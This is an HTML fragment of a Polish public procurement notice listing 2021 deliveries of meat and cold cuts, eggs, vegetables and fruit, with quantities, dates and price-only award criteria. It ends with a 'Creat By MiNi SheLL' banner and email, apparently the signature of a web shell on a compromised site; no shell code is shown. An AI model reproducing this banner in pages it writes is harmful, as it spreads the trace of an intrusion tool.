Wspólny Słownik Zamówień(CPV): </b>15000000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Mięso i wędliny w roku 2021</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Baleron gotowany, wędzony, mięso - karkówka wieprzowa, bez nadmiernego przerostu tłuszczu, o zawartości powyżej 70% mięsa w 100g baleronu. kg	10Boczek wędzony gotowany, peklowany, bez żeberek, chudy, o kształcie prostokąta. Zawartość mięsa powyżej 80% w 100g boczku. kg	125Boczek wędzony peklowany, bez żeberek, chudy, o kształcie prostokąta. Zawartość mięsa powyżej 80% w 100g boczku. kg	40Flaki wołowe blanszowane czyszczone, o barwie białej, parzone, krojone w paski, w opakowaniach do 3 kg.	kg	90Kaszanka w naturalnej osłonie parzona, wyprodukowana z podrobów(20 %) i tłuszczu (20%) w 100g kaszanki, z dodatkiem krwi, kaszy i przypraw (dobrze wymieszane składniki), w osłonce naturalnej	kg	130Kiełbasa biała wieprzowa,średniorozdrobniona , parzona, o zawartości minimum 60% mięsa w 100g kiełbasy. Składniki średnio rozdrobnione, dobrze wymieszane, w osłonce naturalnej ściśle przylegającej do farszu, 1 szt 80-100g kg	30Kiełbasa krakowska parzona wieprzowo - wołowa, o zawartości mięsa powyżej 60% w 100g kiełbasy, grubo rozdrobniona. kg	180Kiełbasa mielonka wieprzowa, o zawartości mięsa powyżej 60% w 100g kiełbasy, składniki średnio rozdrobnione.	kg	44Kiełbasa mortadela wieprzowo-wołowa, o zawartości mięsa 50% w 100g kiełbasy, homogenizowana, w osłonce sztucznej ściśle przylegającej do farszu. kg	50Kiełbasa parówkowa wieprzowa, o zawartości powyżej 70% mięsa w 100g wyrobu. Składniki drobno rozdrobnione, dobrze wymieszane, w osłonce sztucznej, ściśle przylegającej do farszu, 1 szt 100 -110g kg	180Kiełbasa podwawelska kiełbasa wieprzowa, średnio rozdrobniona, parzona, wędzona zawierająca minimum 70% mięsa wieprzowego w 100 gramach kiełbasy, w osłonce naturalnej	kg	50Kiełbasa szynkowa gruborozdrobniona, wieprzowa, wędzona, parzona, zawierająca minimum 60% mięsa wieprzowego w 100g kiełbasy	kg	230Kiełbasa wiejska drobiowa cienka, wędzona,piewczona o zawartości powyżej 70 gram mięsa drobiowego i 46 gram mięsa wieprzowego w 100g wyrobu. Składniki średniorozdrobnione, dobrze wymieszane, w osłonce naturalnej, ściśle przylegającej do farszu.	kg	100kiełbasa swojska, wieprzowa, cienka, wędzona, pieczona, o zawartosci powyżej 70 gram mięsa drobiowego i 46 gram miesa wieprzowego w 100 gramach wyrobu. Składniki średniorozdrobnione, dobrze wymieszane, w psłonce naturalnej, ściśle przylegającej do farszu.	kg	250Kiełbasa zielonogórska wieprzowa ,średnio rozdrobniona, parzona zawierająca min.51% mięsa wieprzowego w 100 gramach kiełbasy.	kg	59Kiełbasa zwyczajna wieprzowa, cienka, składniki średnio rozdrobnione, o zawartości 60% mięsa w 100g kiełbasy, z małą ilością tłuszczu, w osłonce naturalnej ściśle przylegającej do farszu, skórka łatwo się ściągająca. kg	190Kiełbasa żywiecka wieprzowa, wędzona, pieczona,o zawartości powyżej 80% mięsa w 100g kiełbasy. Składniki średnio rozdrobnione, dobrze wymieszane. W osłonce sztucznej, ściśle przylegającej do farszu, przylegającej do farszu, skórka łatwo się ściągająca. kg	300Kości wieprzowe	kg	500Kości wołowe	kg	300Kurczak świeży surowy, waga tuszki ok.1,60 - 1,8 kg I gat. oczyszczony, wypatroszony, barwa mięśnia różowa, bez nadmiernego wycieku, schłodzony, nie mrożony, pozbawiony piór. kg	550Mięso – filet z kurczaka surowy, I gat., bez kości, barwa mięśnia- różowa,waga netto, bez śladów wody i lodu.	kg	150Mięso udko z kurczaka, surowe, I gat. , oczyszczony, bez piór, barwa mięśnia różowa, waga 1 szt 230-250g	kg	1300Mięso gulaszowe wieprzowe gatunek I , chude,bez skóry, bez słoniny, barwa mięśnia-jasno różowa,waga netto, bez śladów wody i lodu.	kg	770Mięso gulaszowe wołowe gatunek I chude, barwa mięśnia-jasno czerwona,waga netto, bez śladów wody i lodu.	kg	660Mięso karczek wieprzowy bez kości I gat, chudy,waga netto, bez śladów wody i lodu.	kg	20Mięso łopatka wieprzowa bez kości, I gat, bez skóry, bez słoniny, barwa mięśnia-jasno różowa,waga netto, bez śladów wody i lodu.	kg	20Mięso pieczeń woł. I gat. młode, bez tłuszczu, o barwie mięśnia - jasno czerwonej, nie przerośnięta żyłami, waga netto, bez śladów wody i lodu.	kg	350Mięso schab z kością I gat. bez słoniny, barwa mięśnia – różowa,waga netto, bez śladów wody i lodu.	kg	750Mięso żeberka – surowe, wąskie, cięte paski, chude,waga netto, bez śladów wody i lodu.	kg	120Ogonówka wędzona gotow.wieprzowa, o zawartości powyżej 80% mięsa w 100g ogonówki.	kg	130Parówki cienkie drobiowo- wieprzowa o zawartości powyżej 60% mięsa w 100g wyrobu	kg	610Pasztet drobiowy o zawartości podrobów i mięsa powyżej 70% w 100g wyrobu, powierzchnia pasztetu zapieczona	kg	250Pasztetowa drobiowa o zawartości surowców drobiowych powyżej 41% (skórki z indyka i kurczaka, wątroba z kurczaka, mięso mechanicznie oddzielone indycze), i surowców wieprzowych powyżej 20% (tłuszcz wieprzowy, skórki wieprzowe, wątroba wieprzowa). kg	275Polędwica drobiowa gruborozdrobniona zawierająca minimum 76 % mięsa drobiowego w 100 gramach polędwicy.	kg	155Polędwica sopocka wieprzowa wędzona, parzona, o zawartości powyżej 80% mięsa w 100g polędwicy.	kg	35Rolada boczkowa wędzona gotowana zawierająca minimum 70% mięsa w 100 gramach produktu	kg	25Rolada schabowa wędzona gotowana zawierająca minimum 70% mięsa w 100 gramach produktu.	kg	28Salceson drobiowy z indyka batony we folii, parzony, z małą ilością galarety, o zawartości mięsa drobiowego min 70% w 100g salcesonu, bez chrząstek. kg	350Szynka gotowana drobiowa - blok indyczy, o zawartości powyżej 60% mięsa w 100g szynki, składniki grubo rozdrobnione, równomiernie rozłożone, w osłonce sztucznej ściśle przylegającej do farszu.	kg	20Szynka konserwowa wieprzowa, o zawartości powyżej 60% mięsa w 100g szynki, prasowana, mięso grubo rozdrobnione.	kg	138Szynka wiejska, wędzona gotowana parzona, mięso nie rozdrabniane, w kawałku, 100 g produktu otrzymanego ze 120g mięsa wieprzowego, chuda, nie popękana. kg	285Wątroba drobiowa surowa, różowa, z kurczaka, bez żółci.	kg	110Wątroba wieprzowa o barwie jasno brązowej, bez przekrwień, bez żółci.	kg	47Żołądki drobiowe surowe, oczyszczone, z kurczaka.	kg	10<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Jaja kurze w roku 2021</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Jaja z chowu ściółkowego, oznakowane pieczęcią: rodzaj chowu, kraj pochodzenia, nr weterynaryjny fermy, rozmiar M o wadze 53-63g., data ważności co najmniej trzy tygodnie od dnia dostawy, wtrakcie dostaw dołączone weterynaryjne dokumenty dopuszczające, w ilości 49 700 szt. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>Ziemniaki, warzywa okopowe, styczeń - kwiecień w roku 2021</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Buraki czerwone	kg.	700Cebula	kg.	800Kapusta biała	kg.	420Kapusta czerwona	kg.	160Marchew kg.	1650Pietruszka	kg.	470Por	szt	100Seler	kg.	670Ziemniaki	kg.	9000<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-04-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>8</td><td><b>Nazwa: </b></td><td>Owoce, warzywa pozostałe, styczeń - kwiecień w roku 2021</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Banany owoce zdrowe, o barwie żółtej, bez ciemnych przebarwień, dojrzałe, średniej wielkości kg	250Cytryny dojrzałe owoce , średniej wielkości , cienka skórka	kg	111Fasola Jaś biała, sucha, duża, bez śladu pleśni i robaków, pakowana w worki foliowe po 5kg	kg	27Groch żółty łuskany ,suchy, bez śladu pleśni i robaków, pakowany w worki foliowe po 5kg	kg	40Grzyby pieczarki świeże , białe, średniej wielkości, bez uszkodzeń, czyste	kg	40Grzyby suszone - podgrzybki suche, bez śladu pleśni i robaków, pakowane w worki foliowe po 20-50 gram	kg	0,5Jabłka deserowe gat.I, owoce dojrzałe o wadze 1szt – 150g - 200g	kg	2 600Kapusta kiszona dobrej jakości, o barwie białej, bez posmaku goryczki, bez dodatku octu, pakowana w opak.foliowe o wadze 1 kg-5 kg.	kg	75Kapusta pekińska świeża, średnia wielkość, nie uszkodzona, bez posmaku goryczki, o wadze 1 -1,40kg	szt.	60Kiwi , 1 szt. 80g – 130g, owoce dojrzałe, zdrowe	kg	80Mandarynki 1 szt. ok. 50g, owoce zdrowe, bez pestek, słodkie	kg	130Ogórki kiszone solony z umiarem, twardy, pakowany w opakowania foliowe o wadze 1 kg-5 kg . Ogórki średniej wielkości.	kg	305Pomarańcze 1 szt. ok. 150g-200g, owoce zdrowe, dojrzałe, słodkie	kg	250Pomidory świeże świeży, dojrzały, zdrowy, twardy, średniej wielkości	kg	730Rzodkiewka świeża, zdrowa, bez posmaku goryczki, pęczki, rzodkiewki średniej wielkości (12 - 15 szt w pęczku)	pęcz.	100Sałata zielona świeża, czysta, główki,o wadze około 200-300g, bez posmaku goryczki, nie uszkodzona, pakowana w skrzynkach szt.	90Szczypior świeży zielony, waga od 50-100g	pęcz.	500<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15000000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-04-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com